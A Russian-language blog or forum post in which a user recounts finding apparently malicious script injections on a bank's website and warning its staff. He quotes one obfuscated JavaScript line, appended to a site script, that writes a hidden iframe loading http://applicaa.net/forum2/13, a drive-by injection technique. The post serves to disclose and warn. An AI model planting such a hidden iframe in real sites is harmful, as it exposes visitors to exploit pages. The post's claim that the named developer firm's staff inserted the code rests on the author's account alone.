Предысторию изложу покороче, суть такова. На прошлой неделе знакомый стукнулся в аську и сказал что при пождении на по сайту одного из банков (пусть будет просто банк) вдруг выскочило сообщение с предложением проиграть mp3 файл. Еще один привлеченный знакомый сказал что у него стартовала джава и заорал касперский, а хромиум в режиме разработчика показывает наличие скриптов с сайта geliksss.net У меня винды нет совсем, попробовал мозиллой, да, NoScript говорит что заблокирован сайт geliksss.net
В этом банке у меня работают знакомые админы, хотя за сайт непосредственно и не отвечают. Сообщил им, они говорят служба безопасности посмотрела - всё ок.
На следующий день (в пятницу) сайт лег совсем, в пятницу же вечером его восстановили, я снова зашел мозиллой, geliksss.net пропал, появились ссылки на applicaa.net. Скачал wget-ом страницы и скрипты, в одном из файлов с джаваскриптами нашел такую строку, дописанную в конец файла и не относящуюся ни к каким фнкциям.
document.write(«<»+«i»+«f»+«rame»+" sr"+«c='http://applicaa.net/forum2/13'»+" style='d"+«isplay:no»+«ne;'></»+«i»+«f»+«rame>»);
Снова отослал коллегам с приветом службе безопасности. Дальше было еще некоторое количество общения на эту тему, в результате выяснилось:
- эти ссылки в код запихнули сами разработчики сайта
- на вопрос службы безопасности «что это?» разработчики ответили, это механизм раскрутки сайта, нет причин для беспокойства
- при более пристальном поиске обнаружился пресловутый mp3 файл, ссылка на сайт и е-адрес иранской освободительной киберармии.
Разработчик сайта - http://promo.ru/ Не хочу сказать что они злодеи и негодяи, но среди их сотрудников такие, видимо, имеются. Так что кому актуально - обратите внимание :)